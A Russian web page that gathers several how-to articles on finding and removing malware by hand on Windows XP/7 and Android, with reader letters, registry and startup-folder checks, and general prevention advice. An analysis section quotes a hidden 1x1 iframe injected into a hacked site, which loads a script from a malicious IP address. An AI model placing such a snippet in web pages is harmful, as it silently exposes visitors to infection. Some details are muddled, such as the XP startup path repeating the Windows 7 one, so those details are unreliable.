###
  • Интернет
  • Программы
  • Игры
  • Проблемы
  • Windows
  • Социальные сети
  • Android
  • Ios

    • Как удалить вирус вручную с компьютера? Как найти вирусы в компьютере вручную? Как удалить вирусы с компьютера самостоятельно.

    15.09.2019 Мобильный интернет

    • Письмо первое. Здравствуйте, я к вам с проблемой, а именно-, на одном сайте скачала курсовую, стала открывать файл и вместо программы Microsoft Office Word, запустилась какая-то установка. Тут же антивирусная программа выдала предупреждение об обнаруженной угрозе, исходящей из папки
      C:\Users\Моё имя пользователя\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup .
      Как я поняла, папка Start Menu, это папка Автозагрузки. Не смотря на то, что компьютер стал ужасно тормозить, я зашла в эту папку и увидела странный файл с названием QJFGSXETY, у файла атрибут скрытый. Попытка удалить файл закончилась неудачей. Загрузилась в безопасном режиме, но и там его удалить не получилось и переименовать (что бы потом удалить после перезагрузки) тоже. Пыталась использовать , но вышло сообщение "Восстановление системы отключено групповой политикой". На этом мои хакерские знания закончились, сижу вот без компьютера и читаю ваши статьи. Что делать-то, если можно пошагово. Марина. г. Суздаль
    • Письмо второе. Никак не могу удалить вирус с компьютера, сначала он прописался в автозагрузке, самостоятельно удалить не смог, даже в , компьютер жутко долго загружался и при работе тормозил, воспользовался советом из статьи и скачал диск спасения ESET NOD32 (его кстати, можно использовать в качестве простого Live CD, удобная вещь, рекомендую). Проверил им весь компьютер, 5 вредоносных программ нашёл, час сидел ждал, перезагрузился и вируса как не бывало, но обрадовался рано, пропал интернет, в сетевых подключениях жёлтый треугольник и пишет -Сетевое подключение ограничено или отсутствует. Что делать, значит вирус до конца я не удалил? Фёдор.

    Как удалить вирус с компьютера

    Такие же проблемы, попались мне несколько дней назад, попросил меня одноклассник установить ему пару бесплатных программ и антивирусник ESET NOD32, который приобрел на оф. сайте. Кроме NOD32, мы установили бесплатную программу контролирующую автозагрузку- , ещё создали на всякий случай образ системы и диск восстановления, поблагодарил он меня, на том и расстались.

    Через день, мой знакомый звонит обеспокоенный и говорит. Слушай старик, дочке в интернете на почту письмо пришло, мы его открыли, там вроде открытка, с днём рождения поздравляют, хотя день рождения уже прошёл давно, кроме открытки ещё был файл, мы и нажали на него, тут же AnVir Task Manager вывел окно, в котором сказал, что какая-то программа со странным названием и значком системного файла, хочет пройти в автозагрузку,

    мы разрешили и началось, антивирусник постоянно ругается и выводит грозное предупреждение - Очистка невозможна, при этом компьютер сильно зависает и мы его аварийно выключили, ты наверно с таким встречался, помоги чем можешь.

    Приезжаю я к ним, первая мысль была - схватили, включаю компьютер, а там вот что.
    NOD32 выводит поочерёдности два окна, в которых предупреждает, что в оперативной памяти находится вредоносный процесс, очистка невозможна! исходящий из папки Автозагрузки (Startup).

    В Windows 7 папка автозагрузки находится по адресу:
    C:\Users\Имя пользователя\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup .
    Кстати в Windows XP папка автозагрузки расположена почти также:

    AnVir Task Manager показывает загрузку процессора 93%.

    C:\Users\ Имя пользователя\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.
    И вот он наш вирусный файл, пытаюсь его удалить, конечно неудачно, ведь он сейчас важным делом занят.

    Первое, что нужно сделать в таких случаях, это запустить Восстановление системы и попробовать откатиться с помощью ранее созданной точки восстановления назад. Пытаюсь запустить восстановление системы и в течении очень долгого времени ничего не происходит.
    Кстати, вирус иногда наделает делов в групповых политиках и вам не удастся запустить восстановление системы при таком сообщении "Восстановление системы отключено групповой политикой ".
    Тогда нужно зайти в Групповые политики Пуск-Выполнить-gpedit.msc. ОК

    Открывается Групповая политика, здесь нам нужно выбрать Конфигурация компьютера-Административные шаблоны-Система-Восстановление системы- Если щёлкнуть два раза левой кнопкой на пункте Отключить восстановление системы,

    должно появиться такое окно, для нормальной работы восстановления системы, в нём вы должны отметить пункт "Не задан" или "Отключен". Всё вступит в силу после перезагрузки. Так же вам нужно знать, что в версиях Windows Home нет Групповой политики.

    Запустить восстановление системы мне так и не удалось и я решил перегрузить компьютер и зайти в безопасный режим. В Безопасном режиме можно опять попытаться удалить данный файл из автозагрузки, в большинстве случаев вам это удастся.

    Но у меня ничего не получается, видимо случай особый и вредоносный файл не удаляется. Тогда идём в реестр, а именно смотрим ветку:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run.
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\RunOnce
    В Windows 7 и Windows XP, для всех пользователей, программы запускаемые при входе в систему оставляют свои ключи в этих ветках, но в основном в первой Run. Все незнакомые ключи нужно удалить, но только незнакомые, в моём случае в автозагрузке присутствует ключ антивирусной программы NOD32 - egui.exe, его удалять ненужно:
    "C:\Program Files\ESET\ESET Smart Security\egui.exe" /hide /waitservice

    Ещё надо пройти Пуск->Выполнить->msconfig->Автозагрузка и убрать галочки со всех неизвестных программ. Здесь тоже ничего подозрительного нет.

    Так же удалить все незнакомые файлы в корне диска (С:), если вы увидите там файлы с таким же названием QYSGFXZJ или похожими, попробуйте удалить их. В корне (С:) у нас кстати непонятная папка QYSGFXZJ. Пытаюсь удалить-удаляется.

    Итак, как удалить вирус с компьютера , если даже в безопасном режиме, нам это не удалось или к примеру вы не смогли по каким-то причинам войти в безопасный режим? Бывает в Безопасный режим вы войдёте, но там вас ждёт сюрприз – к примеру не работает мышь.

    Если в безопасный режим войти вам не удастся, то вы можете воспользоваться очень простым и проверенным советом из другой нашей статьи Как проверить компьютер на вирусы бесплатно, с помощью диска восстановления ESET NOD32 или Dr.Web. Кстати данные диски можно использовать в качестве Live CD. Или у вас уже есть Live CD, попытайтесь загрузиться с него и проделать то же самое, что и в безопасном режиме – зайти в папку Автозагрузка и удалить вредоносный файл, Работая в Live CD, вы можете запустить с флешки антивирусный сканер, к примеру Dr.Web CureIt .
    Лично я, когда встречаю подобную проблему в Windows ХР, (про Windows 7 информация ниже), даже иногда не захожу в безопасный режим, а использую по старинке совершенное оружие -профессиональный инструмент системного администратора .

    • Примечание: все возможности диска восстановления ERD Commander 5.0. описаны в нашей статье ERD Commander. С помощью него можно восстанавливать систему, править реестр, изменять забытый пароль и другое. Для современных компьютеров и ноутбуков, ERD Commander 5.0 нужен с интегрированными SATA драйверами. Давайте загрузимся с него и посмотрим как всё произойдёт.

    Перезагружаемся и заходим в BIOS, там выставляем загрузку с дисковода. Загружаемся с диска ERD Commander 5.0. Выбираем первый вариант подключение к Windows ХР, то есть мы с вами сможем работать к примеру непосредственно с реестром нашей заражённой системы.

    Обычный Live CD, такой возможности вам не даст. Кстати если выбрать второй вариант (None), то ERD Commander будет работать без подключении к системе, то есть как простой Live CD и тогда многие возможности ERD, такие как восстановление системы, просмотр объектов автозапуска, журнала событий системы и др. вам будет не доступен. Но даже из него иногда получается извлечь пользу.

    Не много не привычный с начала рабочий стол, но это не страшно, ещё раз скажу, что описание всех инструментов ERD, есть в нашей статье ERD Commander.

    Идём сразу в Административный инструмент Autoruns.

    Смотрим в пункте System, а так же Администратор и вот пожалуйста наш вирус, уж здесь мы его точно удалим.

    Delete - удаляем процесс из автозапуска и всё, наш вирус удалён.
    Explorer – даёт возможность перейти к файлу процесса.
    Затем ещё раз проверяем папку автозагрузка и там уже ничего нет.

    C:\Documents and Settings\Администратор\Главное меню\Программы\Автозагрузка
    Заходим на всякий случай в корневую папку диска (С:), там ничего подозрительного нет.

    Не поленимся зайти в реестр и посмотреть какие программы оставили свои ключи в автозагрузке:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

    Ну вот мы и удалили вирус из Windows ХР, после нормальной загрузки, стоит проверить весь компьютер на присутствие вирусов.
    А как быть с Windows 7 - можете спросить вы, если мы в этой операционной системе схватим вирус и не сможем удалить его в безопасном режиме. Во первых вы можете воспользоваться дисками спасения (ссылка на статью выше). Во вторых использовать простой Live CD или как я профессиональный инструмент –диск восстановления Microsoft Diagnostic and Recovery Toolset. Полная информация как применять данный инструмент, к примеру при удалении баннера- вымогателя выложена в статье "Как удалить баннер". Здесь же скажу, что это такой же инструмент как и ERD Commander, только создан он в первую очередь для Windows 7. При помощи него так же можно восстанавливать систему, изменять реестр, проводить операции с жёстким диском, изменять забытый пароль и многое другое.
    Загружаемся с данного диска MS DaRT 6.5. наш компьютер.Ну и самое последнее. После удаления вируса в Windows XP, у вас возможно не будет функционировать интернет, это происходит из-за нарушений, которые вносит вирус в сетевые параметры. Помочь здесь сможет иногда переустановка драйверов сетевой карты или в большинстве случаев, испробованная много раз утилита WinSockFix , которая как раз эти параметры исправляет. Скачать её можно на оф. странице программы http://www.winsockfix.nl

    Запускайте утилиту и нажимайте кнопку Fix и всё.

    Кнопка ReG-Backup V перед операцией, может сделать вам резервную копию ключей реестра.

    Отчего ваш мобильный телефон вдруг начал вести себя не так, как обычно, или вообще «зажил» своей «жизнью»? Возможно, оттого, что в нем поселилась вредоносная программа. Сегодня количество вирусов и троянов для Андроид растет в геометрической прогрессии. Почему? Да потому, что ушлые ребята-вирусописатели знают, что смартфоны и планшеты всё чаще используются нашими согражданами в качестве электронных кошельков, и делают всё, чтобы переместить средства со счетов владельцев в свой карман. Давайте поговорим о том, как понять, что мобильное устройство подхватило инфекцию, как удалить вирус с Андроида и обезопасить себя от повторных заражений.

    Симптомы вирусного заражения Android-устройства

    • Гаджет включается дольше, чем обычно, тормозит или внезапно перезагружается.
    • В истории SMS и телефонных звонков есть исходящие сообщения и вызовы, которых вы не совершали.
    • Со счета вашего телефона сами по себе списываются деньги.
    • На рабочем столе или в браузере отображается реклама, не связанная с каким-либо приложением или сайтом.
    • Сами по себе устанавливаются программы, включается Wi-Fi, Bluetooth или камера.
    • Пропал доступ к электронным кошелькам, мобильному банку или по неизвестным причинам уменьшилась сумма на счетах.
    • Кто-то завладел вашим аккаунтом в социальных сетях или мессенджерах (если используются на мобильном устройстве).
    • Гаджет заблокирован, а на экране отображается сообщение, что вы что-то нарушили и должны заплатить штраф или просто перевести кому-то деньги за разблокировку.
    • Внезапно перестали запускаться приложения, пропал доступ к папкам и файлам, заблокировались какие-либо функции устройства (например, не нажимаются кнопки).
    • При запуске программ выскакивают сообщения, вроде «в приложении com.android.systemUI произошла ошибка».
    • В списке приложений появились неизвестные иконки, а в диспетчере задач — неизвестные процессы.
    • Антивирусная программа информирует вас об обнаружении вредоносных объектов.
    • Антивирусная программа самопроизвольно удалилась с устройства или не запускается.
    • Батарея телефона или планшета стала разряжаться быстрее, чем всегда.

    Не все из этих симптомов стопроцентно указывают на вирус, но каждый является поводом немедленно просканировать устройство на предмет заражения.

    Самый простой способ удаления мобильного вируса

    Если гаджет сохранил работоспособность, проще всего убрать вирус с помощью установленного на Android антивируса. Запустите полное сканирование флеш-памяти телефона, при обнаружении вредоносного объекта выберите опцию «Удалить», сохранив обезвреженную копию в карантине (на случай, если антивирус обознался и принял за вирус что-то безопасное).

    К сожалению, этот способ помогает примерно в 30-40% случаев, поскольку большинство вредоносных объектов активно сопротивляется своему удалению. Но управа существует и на них. Далее мы рассмотрим варианты действий, когда:

    • антивирус не запускается, не обнаруживает или не удаляет источник проблемы;
    • вредоносная программа после удаления восстанавливается;
    • устройство (или его отдельные функции) заблокированы.

    Удаление вредоносной программы в безопасном режиме

    Если вам не удается почистить телефон или планшет в обычном режиме, попытайтесь это сделать в безопасном. Основная масса вредоносных программ (не только мобильных) не проявляет в безопасном режиме никакой активности и не препятствует уничтожению.

    Для загрузки устройства в безопасном режиме нажмите кнопку включения/выключения, установите палец на «Отключить питание» и держите его до тех пор, пока не появится сообщение «Переход в безопасный режим». После этого нажмите ОК.

    Если у вас старая версия Android — 4.0 и ниже, выключите гаджет обычным способом и снова включите. При появлении на экране логотипа Android одновременно нажмите клавиши увеличения и уменьшения громкости. Удерживайте их, пока аппарат не загрузится полностью.

    Находясь в безопасном режиме, просканируйте устройство антивирусом. Если антивируса нет или он по каким-то причинам не запускается, установите (или переустановите) его из Google Play.

    Таким способом успешно удаляются рекламные вирусы типа Android.Gmobi 1 и Android.Gmobi.3 (по классификации Dr. Web), которые закачивают на телефон различные программы (с целью накрутки рейтинга), а также показывают на рабочем столе баннеры и объявления.

    Если у вас есть права суперпользователя (root) и вы точно знаете, что именно вызвало проблему, запустите файловый менеджер (например, Root explorer), пройдите по пути расположения этого файла и удалите его. Чаще всего мобильные вирусы и трояны помещают свое тело (исполняемые файлы с расширением.apk) в каталог system/app.

    Для перехода в нормальный режим просто перезагрузите устройство.

    Удаление мобильных вирусов через компьютер

    Удаление вирусов на телефоне через компьютер выручает тогда, когда мобильный антивирус не справляется со своей задачей даже в безопасном режиме или функции устройства частично заблокированы.

    Удалить вирус с планшета и телефона, используя компьютер, тоже возможно двумя способами:

    • с помощью антивируса, установленного на ПК;
    • вручную через файловый менеджер для Андроид-гаджетов, например, Android Commander.

    Используем антивирус на компьютере

    Для проверки файлов мобильного устройства антивирусом, установленным на компьютере, подключите телефон или планшет к ПК USB-кабелем, выбрав способ «Как USB-накопитель».

    Следом включите USB.

    После этого в папке «Компьютер» на ПК появятся 2 дополнительных «диска» — внутренняя память телефона и SD-карта. Для запуска сканирования откройте контекстное меню каждого диска и кликните «Проверить на вирусы».

    Удаляем зловреда через Android Commander

    Android Commander — программа для обмена файлами между мобильным андроид-гаджетом и ПК. Запускаясь на компьютере, она предоставляет владельцу доступ к памяти планшета или телефона, позволяет копировать, перемещать и удалять любые данные.

    Для полноценного доступа ко всему содержимому андроид-гаджета необходимо заранее получить root-права и включить отладку по USB. Последняя активируется через сервисное приложение «Параметры» — «Система» — «Параметры разработчика».

    Далее подключите гаджет к ПК как USB-накопитель и запустите с правами администратора Android Commander. В нем, в отличие от проводника Windows, отображаются защищенные системные файлы и каталоги ОС Андроид — так же, как, например, в Root Explorer — диспетчере файлов для root-пользователей.

    В правой половине окна Android Commander показаны каталоги мобильного устройства. Найдите в них исполняемый файл приложения (с расширением.apk), которое вызывает проблему, и удалите его. Как вариант — скопируйте подозрительные папки с телефона на компьютер и просканируйте каждую из них антивирусом.

    Что делать, если вирус не удаляется

    Если вышеописанные операции ни к чему не привели — вредоносная программа по-прежнему дает о себе знать, а также если операционная система после очистки перестала нормально функционировать, придется прибегнуть к одной из радикальных мер:

    • сбросу с восстановлением заводских настроек через системное меню;
    • hard reset через меню Recovery;
    • перепрошивке аппарата.

    Любой из этих способов приведет устройство к состоянию как после покупки — на нем не останется никаких пользовательских программ, личных настроек, файлов и другой информации (данных об SMS, звонках и т. п.). Также будет удалена ваша учетная запись Google. Поэтому если есть возможность, перенесите телефонную книгу на SIM-карту и скопируйте платные приложения и другие ценные объекты на внешние носители. Желательно сделать это вручную — без использования специальных программ, чтобы случайно не скопировать вирус. После этого приступайте к «лечению».

    Восстанавливаем заводские настройки через системное меню

    Этот вариант самый простой. Им можно воспользоваться тогда, когда функции операционной системы и сам аппарат не заблокированы.

    Зайдите в приложение «Параметры», откройте раздел «Личные» — «Резервное копирование» и выберите «Сброс с восстановлением заводских настроек».

    Hard reset через Recovery-меню

    «Жесткий» сброс настроек поможет справиться со зловредом, если он не удаляется ни одним из перечисленных способов или заблокировал вход в систему. К нашей радости, доступ к меню Recovery (восстановления системы) при этом сохраняется.

    Вход в Recovery на разных телефонах и планшетах осуществляется по-своему. На одних для этого нужно удерживать при включении клавишу «Громкость+», на других — «Громкость-«, на третьих — нажать специальную утопленную кнопку и т. д. Точная информация содержится в инструкции к аппарату.

    В меню Recovery выбираем опцию «wipe data/factory reset» либо просто «factory reset».

    Перепрошивка

    Перепрошивка — это по сути переустановка ОС Андроид, такая же крайняя мера, как переустановка Windows на компьютере. К ней прибегают в исключительных случаях, например, когда некий китайский вирус внедрен непосредственно в прошивку и обитает на устройстве с момента его «рождения». Одним их таких вредоносов является шпионская программа android spy 128 origin.

    Для перепрошивки телефона или планшета потребуются root-права, дистрибутив (сама прошивка), программа инсталляции, компьютер с USB-кабелем или SD-карта. Помните, что для каждой модели гаджета выпускаются свои, индивидуальные версии прошивок. Вместе с ними обычно находятся и инструкции по установке.

    Как избежать вирусного заражения Android-устройств

    • Устанавливайте мобильные приложения только из проверенных источников, откажитесь от взломанных программ.
    • Обновляйте устройство по мере выпуска апдейтов системы — в них разработчики закрывают уязвимости, которые используют вирусы и трояны.
    • Установите мобильный антивирус и держите его всегда включенным.
    • Если гаджет служит вам кошельком, не позволяйте другим людям выходить с него в Интернет или открывать на нем непроверенные файлы.

    Все мы хотя бы раз в жизни сталкивались с вредоносными программами. Вредоносная программа – это приложение, которое следит за вами, уничтожает ваши данные или жесткий диск, а также передает кому-либо другому контроль за вашим девайсом. Что бы ни делала подобная программа, она вряд ли принесет пользу вам или вашему компьютеру. И, учитывая огромное количество и разнообразие существующих вредоносных программ, это всего лишь вопрос времени, когда вы подвергнетесь атаке.

    Не паникуйте - вот наиболее ценный совет, который можно дать человеку, подозревающему наличие вируса на его компьютере. Кроме того, не стоит думать, что теперь вам придется полностью очистить ваш ПК от всех файлов и начать работу на нем с чистого листа. Чаще всего избавиться от вредоносной программы можно, не затрагивая все содержимое. Да, некоторые данные могут быть потеряны в ходе удаления вируса, но вам вряд ли придется удалить все, что у вас есть.

    Для начала вам стоит убедиться, что ваш компьютер действительно заражен вирусом. Существует несколько признаков, позволяющих это распознать. Например, медленная работа или выскакивающее сообщение о повреждении файла при попытке его открыть. Если ваш браузер внезапно меняет начальную страницу или автоматически переходит на незнакомый вам сайт, это также может быть сигналом заражения вредоносным ПО. Также об этом может свидетельствовать частое выключение или поломки компьютера.

    Если вы предполагаете, что ваш компьютер заражен, то вам необходимо запустить антивирусную программу. Некоторые вирусы умны настолько, что отключают антивирусник. Если у вас его вообще нет, то самое время его приобрести и установить. Некоторые вирусы попытаются не дать вам загрузить антивирусное приложение. В таком случае, вам необходимо скачать программу на другой компьютер и перенести ее при помощи диска или флеш-карты.

    Как обнаружить и удалить компьютерный вирус

    По сути, наличие антивирусного программного обеспечения – это практические обязательное требование для всех пользователей операционной системы Windows. Вы можете крайне аккуратно использовать свой компьютер и, исходя из этого, быть уверены, что не подцепите вирус, но правда заключается в том, что создатели вредоносных программ находятся в постоянном поиске новых способов их распространения. На данный момент существует несколько различных антивирусных программ: одни можно установить бесплатно, другие же придется купить. Стоит помнить, что в бесплатной версии почти всегда отсутствуют некоторые важные функции, которые есть в платной версии того же продукта.

    Давайте начнем с предположения, что вы можете запустить антивирусное ПО на своем компьютере (чуть ниже мы расскажем, что делать, если вдруг это невозможно). Если у вас стоит самый современный авнтивирусник, который вовремя обновляется, то он должен обнаруживать вредоносные программы на вашем компьютере. У большинства антивирусных ПО есть специальный раздел со всеми обнаруженными к данному моменту вирусами. Выпишите на отдельный листок все названия найденных на вашем компьютере вирусов – это может потом пригодиться.

    Многие антивирусные программы могут попытаться удалить или изолировать вредоносную программу. Вам всего лишь надо выбрать необходимый вариант и подтвердить ваш выбор. Для большинства пользователей это наилучший вариант решения проблемы; попытка самостоятельно избавиться от вируса может привести к не лучшим последствиям.

    После того, как антивирус сообщит, что вредоносные программы были успешно удалены, вам необходимо выключить или перезагрузить компьютер, а после его повторного включения заново запустить антивирусник. Если он не найдет ни одного вируса, значит проблема решена. Если же вирус будет найден, значит, вам придется заново попытаться его удалить. Если антивирусное ПО раз за разом будет находить одну и ту же вредоносную программу, значит, нужно попытаться удалить ее каким-то другим образом.

    Второй лишний

    Одна антивирусная программа – хорошо, а две – еще лучше, так? Нет! Антивирус может использовать значительную часть вычислительной мощности вашего компьютера. Использование сразу двух антивирусов существенно замедлит ваш компьютер и может даже привести к его сбою.

    Кроме того, далеко не все антивирусные программы совместимы друг с другом, поэтому использование сразу нескольких может сделать ваш компьютер еще более незащищенным, чем отсутствие всяких антивирусов.

    Если вы не можете получить доступ к своему антивирусному программному обеспечению, или при сканировании раз за разом обнаруживается одно и то же вредоносное ПО, вам может потребоваться запуск компьютера в безопасном режиме. Многие компьютерные вирусы могут хранить файлы в папке реестра Windows. В этой папке содержатся инструкции для операционной системы и важная информация о программах на вашем компьютере. В этой же папке может быть заложена программа, которая запускает вирус вместе с запуском операционной системы. Включив свой компьютер в безопасном режиме, вы получите доступ лишь к ключевым элементам операционной системы Windows.

    Попробуйте запустить антивирусное ПО в данном режиме. Если вы увидите, что оно обнаружило новую вредоносную программу, вполне возможно, что именно в этой программе и кроется ключ к решению проблемы. Некоторые вредоносные программы существуют только для того, чтобы скачивать и запускать другие вредоносные программы на вашем компьютере. Будет прекрасно, если вы сможете их все удалить.

    Если по какой-то причине ваш антивирусник не может удалить вирус, то придется еще немного постараться. Помните совет о том, чтобы выписать все названия найденных вирусов? Сейчас они нам могут пригодиться. Вам нужно будет найти каждое из выписанных названий в интернете, обязательно на странице используемой вами антивирусной фирмы. Необходимо использовать именно ту фирму, чье антивирусное ПО у вас стоит, потому что разные фирмы иногда дают разные имена одним и тем же вирусам.

    На большинстве сайтов антивирусного ПО приводятся все файлы, связанные с конкретным вирусов, а также где эти файлы предположительно можно найти. Возможно, вам придется немного покопаться, чтобы найти каждый файл. Перед удалением любых файлов необходимо сохранить резервную копию папки реестра. Если вы случайно удалите не тот файл, это может затруднить или даже нарушить работу вашего компьютера.

    Удалите все связанные с вредоносным ПО файлы, которые есть в вашем списке. Как только это будет сделано, вам нужно будет перезагрузить компьютер, снова запустить антивирусное программное обеспечение и надеяться, что больше никаких вирусов не будет найдено.

    Вы также можете обновить регистрационную информацию своих аккаунтов. Некоторые вредоносные программы могут отслеживать ввод с клавиатуры и отсылать ваши пароли и информацию о вас удаленному пользователю. Это тот случай, когда лучше перестраховаться, чем потом жалеть.


    Защита от компьютерных вирусов

    Существует несколько простых правил, позволяющих защитить себя от компьютерных вирусов. Большинство из них исходят из категории здравого смысла.

    Не открывайте вложения или гиперссылки, присланные вам по мейлу незнакомыми людьми. Часто подобные действия могут перевести вас на страницу с вредоносной программой. Если ваша почта настроена на автоматическое открытие подобных ссылок, измените настройки, иначе вы можете подцепить вирус.

    То же касается и других сообщений. Гиперссылки на доске объявлений, в сообщениях на Facebook или в личной переписке также могут перенести вас на страницу с вирусом. Обратите внимание на отправителя письма. Ищите любые странности, такие, как ошибки в письме или странные формулировки. Если с адреса знакомого вам человека начинают посылать подозрительные ссылки, то стоит сообщить ему об этом – вполне может стать так, что его аккаунт взломали.

    Не заходите на подозрительные веб-сайты. Это касается самых разных ресурсов, начиная со скачивания ПО, музыки и заканчивая пиратским видео и порно. Многие из современных веб-браузеров предупредят вас, если вы попытаетесь перейти на предположительно вредоносный сайт. Обращайте особое внимание на подобные предупреждения и держитесь подальше от таких сайтов.

    Обращайте особое внимание на любые окна, которые открываются в момент просмотра веб-страниц. Будьте особенно осторожны, если сайт выводит вам уведомление о том, что вам нужно загрузить последний видеодрайвер, чтобы что-то посмотреть. Это обычный способ распространения вредоносного ПО.

    Запускайте антивирусную программу хотя бы раз в неделю. Кроме того, регулярно обновляйте антивирус и вашу операционную систему. Большинство обновлений антивирусного ПО выходят не реже одного раза в неделю, так как фирма добавляет большее количество обнаруженных вирусов в свои базы данных.

    Правила, позволяющие избежать заражения вирусом, могут показаться непростыми и требующими слишком большИх усилий, но проще придерживаться этих правил, чем пытаться спасти поврежденный вирусом компьютер.

    В худшем случае

    Если вы не можете удалить вирус вне зависимости от того, какой метод вы пробовали, возможно, пришло время смириться и выполнить полную очистку системы, включающую форматирование жесткого диска и перезагрузку операционной системы. Подобное действие удалит всю вашу информацию, поэтому перед этим обязательно сохраните резервные копии любых важных файлов без вирусов.

    Что делать, если антивирус не справился со своей работой.

        Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или... много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус - это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) - гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами - не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.

    Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден - должна быть запущена какая-то программа. Идеально - с административными правами, желательно - без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. - большинство грамотных пользователей данную опцию отключили навсегда.

    Для отключения функций автозапуска в Windows XP/2000 reg-файл для импорта в реестр.

    Для Windows 7 и более поздних отключение автозапуска можно выполнить с использованием апплета "Автозапуск" панели управления. В этом случае отключение действует по отношению к текущему пользователю. Более надежным способом защиты от внедрения вирусов, переносимых на съемных устройствах, является блокировка автозапуска для всех пользователей с помощью групповых политик:

  • запустить редактор групповых политик gpedit.msc
  • перейти в "Конфигурация компьютера" - - "Конфигурация Windows" - "Административные шаблоны" - "Компоненты Windows" - "Политика автозапуска".
  • установить значение "Вкл." для компонента "Отключить автозапуск"

    •     Но основным "поставщиком" вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение - "Обозреватель Интернета" (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс - интерпретатор данных, полученных извне. Другими словами, - в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать "сайты для взрослых", сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами "скачать бесплатно" и " скачать без регистрации и SMS". Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы.

        Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR"ом, а изменения в реестре отменены PT Startup Monitor"ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:

    iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

    Означающий выполнение CGI-сценария сервера с IP - адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат - вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега "iframe" сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.

        В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами - так называемые руткит (rootkit) - технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.

        Удаление "качественного" вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами - вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, - все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.

